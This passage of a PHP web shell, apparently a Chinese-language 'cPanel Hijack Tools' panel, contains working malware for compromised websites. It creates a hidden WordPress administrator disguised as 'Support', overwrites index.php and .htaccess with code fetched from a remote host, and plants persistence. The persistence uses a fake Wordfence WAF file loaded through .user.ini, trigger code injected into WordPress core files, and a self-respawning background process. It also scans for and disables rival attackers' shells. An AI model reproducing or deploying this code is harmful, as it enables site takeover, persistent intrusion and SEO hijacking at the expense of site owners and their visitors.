                $content = '<form action="?action=add" method="post" name="form"><div class="form-item"><label class="form-label">WP路径</label><div class="input-block"><input type="text" class="form-input" value="'.$path.'" name="path"></div></div><div class="form-item"><label class="form-label">用户名</label><div class="input-block"><input type="text" class="form-input" value="Support" name="user_name"></div></div><div class="form-item"><label class="form-label">密码</label><div class="input-block"><input type="text" class="form-input" value="WpcTl20220207" name="pwd"></div></div><div class="form-item"><label class="form-label">邮箱</label><div class="input-block"><input type="text" class="form-input" value="support@wordpress.org" name="email"></div></div><input type="submit" value="添加新管理员" class="submit"></div></div></form><br>';
                $content .= '<table cellspacing="0" cellpadding="0" border="0" class="table"><thead><tr><td>ID</td><td>用户名</td><td>邮箱</td><td>昵称</td><td>最近一次登陆</td><td>注册时间</td></tr></thead><tbody>';
                while($row = mysqli_fetch_array($sql, MYSQLI_ASSOC)){
                    $last_time = '-';
                    $sql2 = mysqli_query($con , "SELECT `meta_value` FROM `".$table_prefix."usermeta` WHERE `meta_key` = 'session_tokens' AND `user_id` = ".$row['ID']);
                    if(mysqli_num_rows($sql2) > 0){
                        $row2 = mysqli_fetch_array($sql2, MYSQLI_ASSOC);
                        $temp = explode('login', $row2['meta_value']);
                        $temp = str_replace(array(':', 'i', '}', ';', '&quot;', '"'), '', $temp[count($temp)-1]);
                        $last_time = date("Y-m-d H:m:s", trim($temp));
                    }
                    $content .= '<tr><td>'.$row['ID'].'</td><td>'.$row['user_login'].'</td><td>'.$row['user_email'].'</td><td>'.$row['user_nicename'].'</td><td>'.$last_time.'</td><td>'.$row['user_registered'].'</td></tr>';
                }
                $content .= '</tbody></table>';
            }
            mysqli_close($con);
        }
    break;
    case 'hijack':
        $title = 'cPanel 劫持';
        $content = '';
        $htaccess = isset($_POST['htaccess']) ? $_POST['htaccess'] : '';
        $index = isset($_POST['index']) ? base64_decode($_POST['index'], 1) : '';
        $code1 = '';
        $sign = isset($_POST['sign']) ? $_POST['sign'] : '';
        $hijack = isset($_POST['hijack']) ? $_POST['hijack'] : '';
        $hijack = str_replace($dian, '.', $hijack);
        $hijack2 = isset($_POST['hijack2']) ? $_POST['hijack2'] : '';
        $hijack2 = str_replace($dian, '.', $hijack2);
        $fileName2 = isset($_POST['fileName2']) ? $_POST['fileName2'] : '';
        $fileName2 = str_replace($dian, '.', $fileName2);
        $code2 = '';
        $hijack3 = isset($_POST['hijack3']) ? $_POST['hijack3'] : '';
        $hijack3 = str_replace($dian, '.', $hijack3);
        $fileName3 = isset($_POST['fileName3']) ? $_POST['fileName3'] : '';
        $fileName3 = str_replace($dian, '.', $fileName3);
        $code3 = '';

        if($htaccess == ''){
            $htaccess = "<IfModule mod_rewrite.c>".PHP_EOL."RewriteEngine On".PHP_EOL."RewriteBase /".PHP_EOL."RewriteRule ^index.php$ - [L]".PHP_EOL."RewriteCond %{REQUEST_FILENAME} !-f".PHP_EOL."RewriteCond %{REQUEST_FILENAME} !-d".PHP_EOL."RewriteRule . index.php [L]".PHP_EOL."</IfModule>";
        }
        if(file_exists($root.".htaccess")){
            $temp = file_get_contents($root.".htaccess");
            if(md5($temp) != md5($htaccess)){
                @chmod($root.".htaccess", 0755);
                @unlink($root.".htaccess");
                $result = file_put_contents($root.".htaccess", $htaccess);
                if($result){
                    $temp = file_get_contents($root.".htaccess");
                    if(md5($temp) == md5($htaccess)){
                        $content .= ".htaccess 编辑成功。<br>";
                    }else{
                        $content .= ".htaccess 编辑失败。<br>";
                    }
                }else{
                    $content .= ".htaccess 编辑失败。<br>";
                }
            }else{
                $content .= ".htaccess 正常。<br>";
            }
        }else{
            $result = file_put_contents($root.".htaccess", $htaccess);
            if($result){
                $temp = file_get_contents($root.".htaccess");
                if(md5($temp) == md5($htaccess)){
                    $content .= ".htaccess 生成成功。<br>";
                }else{
                    $content .= ".htaccess 生成失败。<br>";
                }
            }else{
                $content .= ".htaccess 生成失败。<br>";
            }
        }
        $code_link = 'http://www.ptfish.top/3.2/stat/ja/index0.txt';
        $temp = get_loaded_extensions();
        foreach($temp as $v){
            if($v == 'i360'){
                $code_link = str_replace('index0.txt', 'index6.txt', $code_link);
                break;
            }
        }
        if($hijack){
            if($code_link == ''){
                $code1 = "<?php require '".$hijack."';?>";
            }else{
                $arr_url = parse_url($hijack);
                $version = str_replace('/stat/index.txt', '', $arr_url['path']);
                $version = ltrim($version, '/');
                if(getHijackNum($hijack) == 9){
                    $code_link = str_replace('/ja/', '/en/', $code_link);
                }
                $code1 = get($code_link);
                $code1 = str_replace('z1007_7', $version, $code1);
                $code1 = str_replace('192.187.108.42', $arr_url['host'], $code1);
            }
            $result = file_put_contents($root."index.php", $code1.$index);
            if($result){
                $content .= $hijack." - index.php 劫持成功。<br>";
            }else{
                $content .= $hijack." - index.php 劫持失败。<br>";
            }
        }
        if($hijack2 && $fileName2){
            if($code_link == ''){
                $code2 = "<?php require '".$hijack."';?>";
            }else{
                $arr_url = parse_url($hijack2);
                $version = str_replace('/stat/index.txt', '', $arr_url['path']);
                $version = ltrim($version, '/');
                if(getHijackNum($hijack2) == 9){
                    $code_link = str_replace('/ja/', '/en/', $code_link);
                }else{
                    $code_link = str_replace('/en/', '/ja/', $code_link);
                }
                $code2 = get($code_link);
                $code2 = str_replace('z1007_7', $version, $code2);
                $code2 = str_replace('192.187.108.42', $arr_url['host'], $code2);
            }
            $result = file_put_contents($root.$fileName2, $code2);
            if($result){
                $content .= $hijack2." - ".$fileName2." 劫持成功。<br>";
            }else{
                $content .= $hijack2." - ".$fileName2." 劫持失败。<br>";
            }
        }
        if($hijack3 && $fileName3){
            if($code_link == ''){
                $code3 = "<?php require '".$hijack."';?>";
            }else{
                $arr_url = parse_url($hijack3);
                $version = str_replace('/stat/index.txt', '', $arr_url['path']);
                $version = ltrim($version, '/');
                if(getHijackNum($hijack3) == 9){
                    $code_link = str_replace('/ja/', '/en/', $code_link);
                }else{
                    $code_link = str_replace('/en/', '/ja/', $code_link);
                }
                $code3 = get($code_link);
                $code3 = str_replace('z1007_7', $version, $code3);
                $code3 = str_replace('192.187.108.42', $arr_url['host'], $code3);
            }
            $result = file_put_contents($root.$fileName3, $code3);
            if($result){
                $content .= $hijack3." - ".$fileName3." 劫持成功。<br>";
            }else{
                $content .= $hijack3." - ".$fileName3." 劫持失败。<br>";
            }
        }

        $defend = isset($_POST['defend']) ? $_POST['defend'] : 0;
        switch($defend){
            case 1:
                $code = '<?php ';
                if($fileName2 && $fileName3){
                    $code .= '$temp = isset($_SERVER[\'REQUEST_URI\']) ? $_SERVER[\'REQUEST_URI\'] : \'\';if(!strstr($temp, "'.$fileName2.'") && !strstr($temp, "'.$fileName3.'")){'.$code1.'}';
                }elseif($fileName2 && $fileName3 == ''){
                    $code .= '$temp = isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : "";if(!strstr($temp, "'.$fileName2.'")){'.$code1.'}';
                }elseif($fileName3 && $fileName2 == ''){
                    $code .= '$temp = isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : "";if(!strstr($temp, "'.$fileName3.'")){'.$code1.'}';
                }else{
                    $code .= $code1;
                }
                $result = file_put_contents($root.'wordfence-waf.php', $code);
                if($result){
                    $code = "; Wordfence WAF".PHP_EOL."auto_prepend_file = '".$root."wordfence-waf.php'".PHP_EOL."; END Wordfence WAF";
                    $result = file_put_contents($root.'.user.ini', $code);
                    if($result){
                        $content .= ".user.ini 守护生成完毕<br>";
                    }
                }
            break;
            case 2:
                $path_file = isset($_POST['path_file']) ? $_POST['path_file'] : '';
                $path_code = isset($_POST['path_code']) ? $_POST['path_code'] : '';
                if(is_wp($root) && $path_file && $path_code){
                    $code = '<?php error_reporting(0);ignore_user_abort;/* '.$sign.' */$root=isset($_SERVER["DOCUMENT_ROOT"])?$_SERVER["DOCUMENT_ROOT"]:"";$htaccess = "'.base64_encode($htaccess).'";if(file_exists($root.".htaccess")){$temp=base64_encode(file_get_contents($root.".htaccess"));if(md5($temp)!=md5($htaccess)){@chmod($root.".htaccess", 0755);@file_put_contents($root.".htaccess", base64_decode($htaccess,1));}}else{@file_put_contents($root.".htaccess", base64_decode($htaccess,1));}';
                    if($hijack){
                        $code .= '$index = "'.base64_encode($code1.$index).'";if(file_exists($root."index.php")){$temp=base64_encode(file_get_contents($root."index.php"));if(md5($temp)!=md5($index)){@chmod($root."index.php", 0755);@file_put_contents($root."index.php", base64_decode($index,1));}}else{@file_put_contents($root."index.php", base64_decode($index,1));}';
                    }
                    if($hijack2 && $fileName2){
                        $code .= '$index = "'.base64_encode($code2).'";if(file_exists($root."'.$fileName2.'")){$temp=base64_encode(file_get_contents($root."'.$fileName2.'"));if(md5($temp)!=md5($index)){@chmod($root."'.$fileName2.'", 0755);@file_put_contents($root."'.$fileName2.'", base64_decode($index,1));}}else{@file_put_contents($root."'.$fileName2.'", base64_decode($index,1));}';
                    }
                    if($hijack3 && $fileName3){
                        $code .= '$index = "'.base64_encode($code3).'";if(file_exists($root."'.$fileName3.'")){$temp=base64_encode(file_get_contents($root."'.$fileName3.'"));if(md5($temp)!=md5($index)){@chmod($root."'.$fileName3.'", 0755);@file_put_contents($root."'.$fileName3.'", base64_decode($index,1));}}else{@file_put_contents($root."'.$fileName3.'", base64_decode($index,1));}';
                    }
                    $code .= '?>';
                    $temp = str_replace("//", "/", $root.$path_file);
                    $result = file_put_contents($temp, $code);
                    if($result){
                        $content .= "WordPress 触发文件 ".$temp." 生成完毕<br>";
                    }else{
                        $content .= "WordPress 触发文件 ".$temp." 生成失败<br>";
                    }
                    $code = "<?php require '".$temp."';?>";
                    $file = explode(',', $path_code);
                    for($i=0;$i<count($file);$i++){
                        $temp = str_replace("//", "/", $root.$file[$i]);
                        if(file_exists($temp)){
                            $t = file_get_contents($temp);
                            if(!strstr($t, $path_file)){
                                $result = file_put_contents($temp, $code.$t);
                                if($result){
                                    $content .= "WordPress 触发代码嵌入 ".$temp." 成功<br>";
                                }else{
                                    $content .= "WordPress 触发代码嵌入 ".$temp." 失败<br>";
                                }
                            }else{
                                $content .= "WordPress 触发代码嵌入 ".$temp." 已经存在<br>";
                            }                   
                        }
                    }
                    $content .= "WordPress 触发式守护 结束<br>";
                }
            break;
            case 3:
                $code = '<?php error_reporting(0);ignore_user_abort;/* '.$sign.' */sleep(3);$root="'.$root.'";$htaccess = "'.base64_encode($htaccess).'";if(file_exists($root.".htaccess")){$temp=base64_encode(file_get_contents($root.".htaccess"));if(md5($temp)!=md5($htaccess)){@chmod($root.".htaccess", 0755);@file_put_contents($root.".htaccess", base64_decode($htaccess,1));}}else{@file_put_contents($root.".htaccess", base64_decode($htaccess,1));}';
                if($hijack){
                    $code .= '$index = "'.base64_encode($code1.$index).'";if(file_exists($root."index.php")){$temp=base64_encode(file_get_contents($root."index.php"));if(md5($temp)!=md5($index)){@chmod($root."index.php", 0755);@file_put_contents($root."index.php", base64_decode($index,1));}}else{@file_put_contents($root."index.php", base64_decode($index,1));}';
                }
                if($hijack2 && $fileName2){
                    $code .= '$index = "'.base64_encode($code2).'";if(file_exists($root."'.$fileName2.'")){$temp=base64_encode(file_get_contents($root."'.$fileName2.'"));if(md5($temp)!=md5($index)){@chmod($root."'.$fileName2.'", 0755);@file_put_contents($root."'.$fileName2.'", base64_decode($index,1));}}else{@file_put_contents($root."'.$fileName2.'", base64_decode($index,1));}';
                }
                if($hijack3 && $fileName3){
                    $code .= '$index = "'.base64_encode($code3).'";if(file_exists($root."'.$fileName3.'")){$temp=base64_encode(file_get_contents($root."'.$fileName3.'"));if(md5($temp)!=md5($index)){@chmod($root."'.$fileName3.'", 0755);@file_put_contents($root."'.$fileName3.'", base64_decode($index,1));}}else{@file_put_contents($root."'.$fileName3.'", base64_decode($index,1));}';
                }
                $code .= '$l12=array("1","2","3","4","5","6","7","8","9","0","q","w","e","r","t","y","u","i","o","p","a","s","d","f","g","h","j","k","l","z","x","c","v","b","n","m","q","w","e","r","t","y","u","i","o","p","a","s","d","f","g","h","j","k","l","z","x","c","v","b","n","m");for($i=1;$i<rand(6,6);$i++){$e14=rand(0,count($l12)-1);$o15.=$l12[$e14];}$q16 = basename(__FILE__, ".php").".php";$c9=file_get_contents($q16);$u17=fopen($o15.".php", "w");fwrite($u17, $c9);fclose($u17);exec("php -f".__DIR__."/$o15.php > /dev/null 2>/dev/null &", $e18);@unlink("$q16");?>';
                $check = file_put_contents($root.'lock3.php', $code);
                if($check == false){
                    $fp = fopen($root.'lock3.txt',"wb");
                    fwrite($fp, $code);
                    fclose($fp);
                    rename($root.'lock3.txt', $root.'lock3.php');
                }
                exec("php -f".$root."/lock3.php > /dev/null 2>/dev/null &", $return);
                $content .= "进程式守护 结束<br>";
            break;
        }
    break;
    default:
        $title = 'cPanel 劫持';
        $content = '<form action="?action=hijack" method="post" id="defend" onsubmit="checkForm();"><div class="form-item form-text"><label class="form-label">.htaccess 原内容</label><div class="input-block"><textarea class="form-textarea" name="htaccess">'.$htaccess.'</textarea></div></div><div class="form-item form-text"><label class="form-label">index 原内容</label><div class="input-block"><textarea class="form-textarea" name="index" id="text-index">'.htmlspecialchars($index).'</textarea></div></div><div class="form-item"><label class="form-label" style="background-color:#ccc;">劫持 - 1</label><div class="input-block"><input type="text" class="form-input" name="hijack" placeholder="在这输入劫持链接"></div></div><div class="form-item"><label class="form-label" style="background-color:#ccc;">劫持-2</label><div class="input-block"><input type="text" class="form-input" name="hijack2" placeholder="在这输入劫持链接"></div></div><div class="form-item"><label class="form-label">文件名-2</label><div class="input-block"><input type="text" name="fileName2" placeholder="在这输入二级劫持文件名,例:xxx.php" class="form-input"></div></div><div class="form-item"><label class="form-label" style="background-color:#ccc;">劫持-3</label><div class="input-block"><input type="text" class="form-input" name="hijack3" placeholder="在这输入劫持链接"></div></div><div class="form-item"><label class="form-label">文件名-3</label><div class="input-block"><input type="text" name="fileName3" placeholder="在这输入二级劫持文件名,例:xxx.php" class="form-input"></div></div><div class="form-item"><label class="form-label">己方标记</label><div class="input-block"><input type="text" name="sign" placeholder="切勿伤及友军" class="form-input" value="be54aace58d583f26839a0e8cd1bf90d"></div></div><div class="form-item"><label class="form-label" style="background-color:#ccc;">守护方式</label><div class="input-block"><input type="radio" name="defend" class="form-radio" value="0" id="defend_0" onclick="tab(0)" checked> <label for="defend_0" onclick="tab(0)">无</label> <input type="radio" name="defend" class="form-radio" id="defend_1" value="1" onclick="tab(1)"> <label for="defend_1" onclick="tab(1)">.user.ini</label>';
        if($is_wp == 1){
            $content .= ' <input type="radio" name="defend" class="form-radio" id="defend_2" value="2" onclick="tab(2)"> <label for="defend_2" onclick="tab(2)">WordPress触发式</label> ';
        }
        if(!strstr(PHP_OS, 'WIN')){
            $content .= '<input type="radio" name="defend" class="form-radio" id="defend_3" value="3" onclick="tab(3)"> <label for="defend_3" onclick="tab(0)">进程式</label>';
        }
        $content .= '</div></div><div class="tab" id="tab_1"><div class="form-item"><label class="form-label">友情提示</label><div class="input-block"><input type="text" class="form-input" name="x" value="部分站点不支持该功能;调用文件名不能选被.htaccess锁码的;若要删除此功能,要先删除.user.ini文件。"></div></div><div class="form-item"><label class="form-label">.user.ini</label><div class="input-block"><input type="text" name="fileName" value="'.$root.'wordfence-waf.php" placeholder="在这输入.user.ini调用文件路径" class="form-input"></div></div></div><div class="tab" id="tab_2"><div class="form-item"><label class="form-label">触发文件</label><div class="input-block"><input type="text" class="form-input" name="path_file" value="wp-admin/css/style-index.css"></div></div><div class="form-item"><label class="form-label">嵌入文件</label><div class="input-block"><input type="text" class="form-input" name="path_code" value="/wp-includes/version.php,/wp-includes/functions.php,/wp-includes/load.php,/wp-includes/template-loader.php"></div></div></div><div class="form-item border-none"><div class="input-block"><input type="submit" class="submit border-none"></div></div></form>';
    break;   
}?><!doctype html>
<html lang="zh">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="robots" content="noindex, nofollow">
<title>cPanel Hijack Tools</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
body{font-size:16px;color:#000;font-sans-serif: system-ui,-apple-system,"Segoe UI",Roboto,"Helvetica Neue","Noto Sans","Liberation Sans",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";line-height:28px;}a{text-decoration:none;}*{padding:0;margin:0;list-style:none;}.fa{padding-right:10px;}.submit{background-color:#1e9fff;vertical-align:middle;
    height: 38px;line-height: 38px;text-align:center;padding:0 18px;color:#FFF;border-radius:5px;cursor: pointer;}.border-none{border:none !important;}
#sidebarMenu{position:fixed;left:0;top:0;z-index:999;color:#fff;background-color:RGBA(33,37,41,var(--bs-bg-opacity,1));width:210px;padding:15px;height:100vh;}
#logo{color:#FFF;border-bottom:1px solid #888;padding-bottom:10px;width:100%;display:block;}
#logo span{font-size:24px;margin-left:10px;line-height:34px;vertical-align:middle;}
.nav{padding-top:10px;}
.nav-item{display:list-item;line-height:42px;}
.nav-item span{background-color:#0d6efd;border-radius:5px;display:block;padding-left:15px;}
.nav-item span a{color:#FFF;text-decoration:none;}
.nav-link{display:list-item;line-height:32px;padding:5px 0 5px 15px;color:#FFF;}
.nav-link:hover,.active{color:#ccffcc;font-weight:bold;}
main{position:absolute;left:240px;vertical-align:top;padding:20px;right:0;}
fieldset{display: block;margin-inline-start: 2px;margin-inline-end: 2px;padding-block-start: 0.35em;padding-inline-start: 0.75em;padding-inline-end: 0.75em;padding-block-end: 0.625em;min-inline-size: min-content;border-width: 2px;border-style: groove;border-color: rgb(192, 192, 192);border-image: initial;}
legend{display:block;padding-inline-start: 2px;padding-inline-end: 2px;border-width: initial;border-style: none;border-color: initial;border-image: initial;margin-left: 20px;
    padding:0 10px;font-size:20px;font-weight:300;}
.field-title{margin:27px 0 20px;border-width:0;border-top-width:1px;}
.table{border-collapse:collapse;border-spacing:0;overflow:scroll;width:100%;}
.table td{word-break:break-all;max-width:300px;background-color:#FFF;}
.table th, .table td{border: 1px solid #ddd;padding:8px;}
.table tbody > tr:hover{background-color:#ccffcc;}
.table tbody > tr:hover td{background:none;}
.form-item{margin-bottom:15px;clear:both;border:1px solid #eee;}
.form-label{position:relative;float:left;display:block;padding:9px 15px;width:80px;font-weight:400;line-height:20px;text-align:right;background-color:#fafafa;}
.form-text .form-label{float: none;width: 100%;border-radius: 2px;box-sizing: border-box;text-align: left;}
.input-block{position:relative;margin-left:110px;min-height:36px;}
.form-text .input-block{margin: 0;left: 0;top: -1px;}
.form-input{display:block;padding-left:10px;width:50%;height:38px;line-height:1.3;line-height:38px\9;border:none;}
.form-text .form-textarea{position:relative;width: 90%;min-height: 100px;height:auto;line-height:20px;border-radius: 0 0 2px 2px;padding: 6px 10px;resize: vertical;border: none;}
.form-radio{margin:12px 0 0 12px;}
.tab{display:none}
</style>
<script type="text/javascript">
function sa(form){for(var i=0;i<form.elements.length;i++){var e=form.elements[i];if(e.type == 'checkbox'){if(e.name != 'chkall'){e.checked = form.chkall.checked;}}}}
function del(){if(confirm("Are you sure?")){return true;}else{return false;}}
function tab(x){for(var i=1;i<3;i++){document.getElementById("tab_"+i).style.display='none';if(i==x){document.getElementById("tab_"+i).style.display='block';}}}
function checkForm(){var controls = document.getElementsByTagName('input');for(var i=0; i<controls.length; i++){if(controls[i].type == 'text'){controls[i].value = controls[i].value.replace(/\./g, "<?php echo $dian;?>");}}var str = window.btoa(unescape(encodeURIComponent(document.getElementById('text-index').value)));document.getElementById('text-index').value = str;
return false;}
</script>
</head>
<body>
<nav id="sidebarMenu">
    <a href="#" id="logo"><span><i class="fa fa-drupal"></i>cPanel Tools</span></a>
    <ul class="nav">
        <li class="nav-item">
            <span><i class="fa fa-optin-monster"></i>cPanel 专栏</span>
            <ul class="nav-toggle">
                <li><a href="?action=cpanel" class="nav-link<?php if($action == 'cpanel' || $action == '') echo ' active';?>">cPanel 劫持</a></li>
            </ul>
        </li>
        <li class="nav-item">
            <span><i class="fa fa-search"></i>击杀敌方输出</span>
            <ul class="nav-toggle">
                <li><a href="?action=anti-virus" class="nav-link<?php if($action == 'anti-virus') echo ' active';?>">查杀大码</a></li>
                <li><a href="?action=trigger" class="nav-link<?php if($action == 'trigger') echo ' active';?>">查找触发式还原码</a></li>
                <li><a href="?action=list" class="nav-link<?php if($action == 'list') echo ' active';?>">文件列表</a></li>
                <li><a href="?action=delAll" class="nav-link<?php if($action == 'delAll') echo ' active';?>">全站删除特定文件</a></li>
            </ul>
        </li>
        <li class="nav-item">
            <span><i class="fa fa-wordpress"></i>Wordpress</span>
            <ul class="nav-toggle">
                <li><a href="?action=wp-user" class="nav-link<?php if($action == 'wp-user') echo ' active';?>">用户列表</a></li>
            </ul>
        </li>
        <li class="nav-item"><span><i class="fa fa-trash-o"></i><a href="?action=unlink">自毁程序</a></span></li>
    </ul>
</nav>
<main>
    <div class="container">
        <fieldset class="field-title">
            <legend><?php echo $title;?></legend>
        </fieldset>
        <?php echo $content;?>
    </div>
</main>
</body>
</html>
<?php
function is_wp($path){
    $i = 0;
    $file = array('wp-config.php','wp-login.php','wp-includes/version.php','wp-content/index.php','wp-admin/admin.php');
    foreach($file as $v){
        if(file_exists($path.$v)){
            $i++;
        }
    }
    if($i==5){
        return 1;
    }else{
        return 0;
    }
}

function get($url){
    $result = '';
    if(ini_get('allow_url_fopen')){
        $result = file_get_contents($url);
    }else{
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $result = curl_exec($ch);
        curl_close($ch);
    }
    return $result;
}

function getTrigger($path, $sign, $auto){
    global $trigger;
    $temp = scandir($path);
    if($temp){
        foreach($temp as $v){
            $fullPath = $path.'/'.$v;
            $fullPath = str_replace('//', '/', $fullPath);
            if(is_dir($fullPath)){
                if($v == '.' || $v == '..'){
                    continue;
                }
                getTrigger($fullPath, $sign, $auto);
            }else{
                $x = '';
                if(strstr($v, ".")){
                    $x = explode(".", $v);
                    $x = $x[count($x) - 1];
                }
                if(strtolower($x) == 'php'){
                    $txt = file_get_contents($fullPath);
                    $status = 0;
                    if(strstr($txt, "file_exists") && strstr($txt, "file_put_contents") && strstr($txt, "chmod") && strstr($txt, "file_get_contents") && strstr($txt, "index.php") && strstr($txt, ".htaccess")){
                        $status = 1;
                        $type = '常规还原码';
                    }elseif(strstr($txt, "@include") && strstr($txt, "preg_match") && strstr($txt, "file_get_contents")){
                        $status = 1;
                        $type = '批量还原码';
                    }elseif(strstr($txt, "ckII")){
                        $status = 1;
                        $type = '同行';
                    }elseif(strstr($txt, "@include") && strstr($txt, "\x")){
                        $status = 1;
                        $type = '广告联盟';
                    }elseif(strstr($txt, $sign)){
                        $status = 1;
                        $type = '己方标记';
                    }

                    if($status == 1){
                        $trigger .= '<tr><td align="center"><input type="checkbox" name="files[]" value="'.$fullPath.'"></td><td><a href="?path='.escape($fullPath).'&action=edit" target="_blank">'.$fullPath.'</td><td align="center">'.substr(sprintf('%o', fileperms($fullPath)), -4).'</td><td align="center">'.date("Y-m-d H:i:s", filectime($fullPath)).'</td><td align="center">'.date("Y-m-d H:i:s", filemtime($fullPath)).'</td><td align="center">'.date("Y-m-d H:i:s", fileatime($fullPath)).'</td><td align="center">'.round(filesize($fullPath) / 1024, 2).' Kb</td><td align="center">'.$type.'</td></tr>';
                        if($auto == 1 && !strstr($txt, $sign)){
                            $txt = str_replace('file_put_contents', '//file_put_contents', $txt);
                            $txt = str_replace('fwrite', '//fwrite', $txt);
                            file_put_contents($fullPath, $txt);
                        }
                    }
                }
            }
        }
    }
}

function hardScandir($dir){
    if(function_exists("scandir")){
        return scandir($dir);
    }else{
        $dh = opendir($dir);
        while(false !== ($filename = readdir($dh)))
            $files[] = $filename;
        return $files;
    }
}

function escape($uri){
    global $dian;
    $result = str_replace('%2F', '/', rawurlencode($uri));
    $result = str_replace('.', $dian, $result);
    return $result;
}

function checkSize($fileSize, $checkSize){
    $status = false;
    if(abs($fileSize - $checkSize) < 250){
        $status = true;
    }
    return $status;
}

function getHijackNum($link){
    $z = 0;
    $x = explode('_', $link);
    if(isset($x[1])){
        $y = explode('/', $x[1]);
        if(isset($y[0])){
            $z = $y[0] % 10;
        }
    }
    return $z;
}

function getDelAll($path, $md5, $auto){
    global $shell;
    $temp = scandir($path);
    if($temp){
        foreach($temp as $v){
            $fullPath = $path.'/'.$v;
            $fullPath = str_replace('//', '/', $fullPath);
            if(is_dir($fullPath)){
                if($v == '.' || $v == '..'){
                    continue;
                }
                getDelAll($fullPath, $md5, $auto);
            }else{
                $size = round(filesize($fullPath) / 1024, 2);
                if($size < 1024){
                    $temp = md5(file_get_contents($fullPath));
                    if($temp == $md5){
                        $shell .= '<tr><td align="center"><input type="checkbox" name="files[]" value="'.$fullPath.'"></td><td><a href="?path='.escape($fullPath).'&action=edit" target="_blank">'.$fullPath.'</td><td align="center">'.substr(sprintf('%o', fileperms($fullPath)), -4).'</td><td align="center">'.date("Y-m-d H:i:s", filectime($fullPath)).'</td><td align="center">'.date("Y-m-d H:i:s", filemtime($fullPath)).'</td><td align="center">'.date("Y-m-d H:i:s", fileatime($fullPath)).'</td><td align="center">'.round(filesize($fullPath) / 1024, 2).' Kb</td></tr>';
                        if($auto == 1){
                            unlink($fullPath);
                        }
                    }
                }
            }
        }
    }
}

function getShell($path, $sign, $auto){
    global $shell;
    $temp = scandir($path);
    if($temp){
        foreach($temp as $v){
            $fullPath = $path.'/'.$v;
            $fullPath = str_replace('//', '/', $fullPath);
            $x = explode(".", $v);
            $x = $x[count($x) - 1];
            if(is_dir($fullPath)){
                if($v == '.' || $v == '..'){
                    continue;
                }
                getShell($fullPath, $sign, $auto);
            }elseif(strtolower($x) == 'php' || strtolower($x) == 'js'){
                $txt = file_get_contents($fullPath);
                if($txt){
                    $txt = strtolower($txt);
                    $size = filesize($fullPath);
                    $status = 0;
                    if(strstr($txt, strtolower($sign))){
                        $status = 2;
                        $type = '己方标记';
                    }else{
                        if(strstr($txt, ';@$') && strstr($txt, ")].$") && strstr($txt, "(('')")){
                            $status = 1;
                            $type = '数组加密-1';
                        }elseif(strstr($txt, ']];$') && strstr($txt, "base64_decode") && strstr($txt, "mktime")){
                            $status = 1;
                            $type = '数组加密-2';
                        }elseif((strstr($txt, '_files') || strstr($txt, 'base64_decode')) && strstr($txt, '_get') && (strstr($txt, "error_reporting") || strstr($txt, "ignore_user_abort") || strstr($txt, "fm_convert_win")) && strstr($txt, 'set_time_limit') && !strstr($v, '.min.js') && !strstr($txt, 'updraftplus') && !strstr($txt, 'EASYPOPULATE_CONFIG')){
                            $status = 1;
                            $type = '未加密-1';
                        }elseif(strstr($txt, '$_post') && (strstr($txt, 'file_put_contents') || strstr($txt, "fopen")) && strstr($txt, 'error_') && strstr($txt, 'script') && strstr($txt, '_files') && (strstr($txt, 'opendir') || strstr($txt, 'scandir')) && strstr($txt, 'chmod')  && strstr($txt, 'filesize') && strstr($txt, 'ini_') && strstr($txt, 'exec(')){
                            $status = 1;
                            $type = '未加密-2';
                        }elseif(strstr($txt, 'php_uname') && strstr($txt, "mail(") && strstr($txt, "json_encode") && strstr($txt, '$_get') && strstr($txt, 'curl_exec')){
                            $status = 1;
                            $type = '邮件型';
                        }elseif(strstr($txt, "eval('?>'.$") && !strstr($txt, 'mustache')){
                            $status = 1;
                            $type = 'eval';
                        }elseif(strstr($txt, 'eval(') && (strstr($txt, "base64_decode(") || strstr($txt, '\x6') || strstr($txt, 'openssl_decrypt'))){
                            $status = 1;
                            $type = 'eval+base64';
                        }elseif(strstr($txt, 'multipart') && strstr($txt, 'type="file"') && (strstr($txt, 'if(@copy') || strstr($txt, '@fopen'))){
                            $status = 1;
                            $type = '上传大码-1';
                        }elseif((strstr($txt, 'base64_decode') || strstr($txt, '@shmop_open')) && strstr($txt, '$_files') && strstr($txt, '@copy') && !strstr($txt, 'wp_handle_upload_error')){
                            $status = 1;
                            $type = '上传大码-2';
                        }elseif(strstr($txt, 'goto') && strstr($txt, ": function") && strstr($txt, ": eval(")){
                            $status = 1;
                            $type = 'goto';
                        }elseif(strstr($txt,'null;@eval(') && strstr($txt,'};$')){
                            $status = 1;
                            $type = '01';
                        }elseif(strstr($txt, 'get_str') && strstr($txt, 'str_rot13') && strstr($txt, '@eval(')){
                            $status = 1;
                            $type = '02';
                        }elseif(strstr($txt, 'ignore_user_abort') && strstr($txt, "@include(pack(")){
                            $status = 1;
                            $type = '03';
                        }elseif(strstr($txt, 'base64_decode') && strstr($txt, "@chmod") && strstr($txt, '=="') && !strstr($txt, 'cpa_ind5.php')){
                            $status = 1;
                            $type = '04';
                        }elseif(strstr($txt, 'gzuncompress(strrev(') && strstr($txt, "create_function") && checkSize($size, 22534)){
                            $status = 1;
                            $type = '05';
                        }elseif(strstr($txt, 'cdn.jsdelivr.net') && strstr($txt, "sweetalert.min.js") && checkSize($size, 13695)){
                            $status = 1;
                            $type = '06';
                        }elseif(strstr($txt, ')return') && strstr($txt, "}else{function")){
                            $status = 1;
                            $type = '07';
                        }elseif(strstr($txt, 'class_uc_key') && strstr($txt, "hexdec") && checkSize($size, 60048)){
                            $status = 1;
                            $type = '08';
                        }elseif(strstr($txt, 'require(@$') && strstr($txt, "error_reporting(0);") && strstr($txt, "set_time_limit(0);")){
                            $status = 1;
                            $type = '09';
                        }elseif(strstr($txt, '$_post') && strstr($txt, '$_cookie') && strstr($txt, 'md5(') && strstr($txt, '@setcookie') && strstr($txt, 'create_function')){
                            $status = 1;
                            $type = '10';
                        }elseif(strstr($txt, ';@include(') && strstr($txt, '$_post') && strstr($txt, '$_cookie') && strstr($txt, 'return @$')){
                            $status = 1;
                            $type = '11';
